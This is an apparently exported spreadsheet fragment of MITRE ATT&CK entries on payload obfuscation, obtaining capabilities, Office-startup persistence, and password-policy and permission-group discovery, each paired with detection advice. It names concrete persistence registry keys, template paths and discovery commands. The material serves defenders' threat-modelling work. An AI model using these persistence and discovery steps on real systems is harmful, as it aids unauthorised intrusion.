Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as JavaScript. 
Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)
Adversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027</t>
  </si>
  <si>
    <t xml:space="preserve">Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system). 
Flag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016) 
Obfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection. 
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 </t>
  </si>
  <si>
    <t>Command: Command Execution, Command: Command Execution, File: File Content, File: File Creation, File: File Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>Christiaan Beek, @ChristiaanBeek; Red Canary</t>
  </si>
  <si>
    <t>Application control, Application control by file name or path, Host forensic analysis, Host intrusion prevention systems, Log analysis, Signature-based detection</t>
  </si>
  <si>
    <t>T1027.001</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Binary Padding</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. 
Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/001</t>
  </si>
  <si>
    <t>05 February 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool.  When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file. </t>
  </si>
  <si>
    <t>File: File Content, File: File Metadata</t>
  </si>
  <si>
    <t>Martin Jirkal, ESET</t>
  </si>
  <si>
    <t>Anti-virus, Signature-based detection</t>
  </si>
  <si>
    <t>T1027.004</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Compile After Delivery</t>
  </si>
  <si>
    <t>Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/004</t>
  </si>
  <si>
    <t>Monitor the execution file paths and command-line arguments for common compilers, such as csc.exe and GCC/MinGW, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior. The compilation of payloads may also generate file creation and/or file write events. Look for non-native binary formats and cross-platform compiler and execution frameworks like Mono and determine if they have a legitimate purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these should only be used in specific and limited cases, like for software development.</t>
  </si>
  <si>
    <t>Praetorian; Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank</t>
  </si>
  <si>
    <t>Anti-virus, Binary Analysis, Host intrusion prevention systems, Signature-based detection, Static File Analysis</t>
  </si>
  <si>
    <t>T1027.005</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Indicator Removal from Tools</t>
  </si>
  <si>
    <t>Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/005</t>
  </si>
  <si>
    <t>The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.</t>
  </si>
  <si>
    <t>Anti-virus, Host intrusion prevention systems, Log analysis, Signature-based detection</t>
  </si>
  <si>
    <t>T1027.002</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Software Packing</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) 
Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.  </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/002</t>
  </si>
  <si>
    <t>Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.</t>
  </si>
  <si>
    <t>Filip Kafka, ESET</t>
  </si>
  <si>
    <t>Anti-virus, Heuristic detection, Signature-based detection</t>
  </si>
  <si>
    <t>T1027.003</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Steganography</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.
[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) 
By the end of 2017, a threat group used &lt;code&gt;Invoke-PSImage&lt;/code&gt; to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)  </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1027/003</t>
  </si>
  <si>
    <t>Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings are other signatures left in system artifacts related to decoding steganography.</t>
  </si>
  <si>
    <t>File: File Content</t>
  </si>
  <si>
    <t>T1588</t>
  </si>
  <si>
    <t>Obtain Capabilities</t>
  </si>
  <si>
    <t>Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
In addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)
In addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588</t>
  </si>
  <si>
    <t>T1588.003</t>
  </si>
  <si>
    <t>Obtain Capabilities: Code Signing Certificates</t>
  </si>
  <si>
    <t>Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/003</t>
  </si>
  <si>
    <t>T1588.004</t>
  </si>
  <si>
    <t>Obtain Capabilities: Digital Certificates</t>
  </si>
  <si>
    <t>Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They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with its owner.
Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.
Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)
After obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/004</t>
  </si>
  <si>
    <t>Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>T1588.005</t>
  </si>
  <si>
    <t>Obtain Capabilities: Exploits</t>
  </si>
  <si>
    <t>Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
In addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)
An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.
Adversaries may use exploits during various phases of the adversary lifecycle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</si>
  <si>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https://attack.mitre.org/techniques/T1588/005</t>
  </si>
  <si>
    <t xml:space="preserve">
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits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</si>
  <si>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T1588.001</t>
  </si>
  <si>
    <t>Obtain Capabilities: Malware</t>
  </si>
  <si>
    <t>Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/001</t>
  </si>
  <si>
    <t>T1588.002</t>
  </si>
  <si>
    <t>Obtain Capabilities: Tool</t>
  </si>
  <si>
    <t>Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/002</t>
  </si>
  <si>
    <t>T1588.006</t>
  </si>
  <si>
    <t>Obtain Capabilities: Vulnerabilities</t>
  </si>
  <si>
    <t>Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
An adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1588/006</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the potential use of exploits for vulnerabilities (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).</t>
  </si>
  <si>
    <t>T1137</t>
  </si>
  <si>
    <t>Office Application Startup</t>
  </si>
  <si>
    <t>Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137</t>
  </si>
  <si>
    <t>Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.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t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Loic Jaquemet; Microsoft Threat Intelligence Center (MSTIC); Nick Carr, FireEye; Praetorian; Ricardo Dias; Sahar Shukrun</t>
  </si>
  <si>
    <t>T1137.006</t>
  </si>
  <si>
    <t>Office Application Startup: Add-ins</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)
Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/006</t>
  </si>
  <si>
    <t>07 November 2019</t>
  </si>
  <si>
    <t>Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1137.001</t>
  </si>
  <si>
    <t>Office Application Startup: Office Template Macros</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)
Office Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) 
Word Normal.dotm location:&lt;br&gt;
&lt;code&gt;C:\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Templates\Normal.dotm&lt;/code&gt;
Excel Personal.xlsb location:&lt;br&gt;
&lt;code&gt;C:\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB&lt;/code&gt;
Adversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under &lt;code&gt;C:\Program Files (x86)\Microsoft Office\root\Office16\&lt;/code&gt;, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) 
An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/001</t>
  </si>
  <si>
    <t>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persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page) Modification to base templates, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.(Citation: GlobalDotName Jun 2019)</t>
  </si>
  <si>
    <t>T1137.002</t>
  </si>
  <si>
    <t>Office Application Startup: Office Test</t>
  </si>
  <si>
    <t>Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
There exist user and global Registry keys for the Office Test feature:
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;
Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/002</t>
  </si>
  <si>
    <t>Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)
Consider monitoring Office processes for anomalous DLL loads.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1137.003</t>
  </si>
  <si>
    <t>Office Application Startup: Outlook Forms</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
Once malicious forms have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/003</t>
  </si>
  <si>
    <t>Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1137.004</t>
  </si>
  <si>
    <t>Office Application Startup: Outlook Home Page</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/004</t>
  </si>
  <si>
    <t>T1137.005</t>
  </si>
  <si>
    <t>Office Application Startup: Outlook Rules</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1137/005</t>
  </si>
  <si>
    <t>T1201</t>
  </si>
  <si>
    <t>Password Policy Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to access detailed information about the password policy used within an enterprise network. Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This would help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as &lt;code&gt;net accounts (/domain)&lt;/code&gt;, &lt;code&gt;Get-ADDefaultDomainPasswordPolicy&lt;/code&gt;, &lt;code&gt;chage -l &lt;username&gt;&lt;/code&gt;, &lt;code&gt;cat /etc/pam.d/common-password&lt;/code&gt;, and &lt;code&gt;pwpolicy getaccountpolicies&lt;/code&gt;.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1201</t>
  </si>
  <si>
    <t>Monitor processes for tools and command line arguments that may indicate they're being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.</t>
  </si>
  <si>
    <t>Sudhanshu Chauhan, @Sudhanshu_C</t>
  </si>
  <si>
    <t>T1120</t>
  </si>
  <si>
    <t>Peripheral Device Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1120</t>
  </si>
  <si>
    <t>T1069</t>
  </si>
  <si>
    <t>Permission Groups Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1069</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Group: Group Enumeration, Group: Group Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>T1069.003</t>
  </si>
  <si>
    <t>Permission Groups Discovery: Cloud Groups</t>
  </si>
  <si>
    <t>Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
With authenticated access there are several tools that can be used to find permissions groups. The &lt;code&gt;Get-MsolRole&lt;/code&gt; PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts.(Citation: Microsoft Msolrole)(Citation: GitHub Raindance)
Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command &lt;code&gt;az ad user get-member-groups&lt;/code&gt; will list groups associated to a user account for Azure while the API endpoint &lt;code&gt;GET https://cloudidentity.googleapis.com/v1/groups&lt;/code&gt; lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1069/003</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</si>
  <si>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Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.</t>
  </si>
  <si>
    <t>T1069.002</t>
  </si>
  <si>
    <t>Permission Groups Discovery: Domain Groups</t>
  </si>
  <si>
    <t>Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
Commands such as &lt;code&gt;net group /domain&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility,  &lt;code&gt;dscacheutil -q group&lt;/code&gt; on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux can list domain-level groups.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1069/002</t>
  </si>
  <si>
    <t>T1069.001</t>
  </si>
  <si>
    <t>Permission Groups Discovery: Local Groups</t>
  </si>
  <si>
    <t>Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
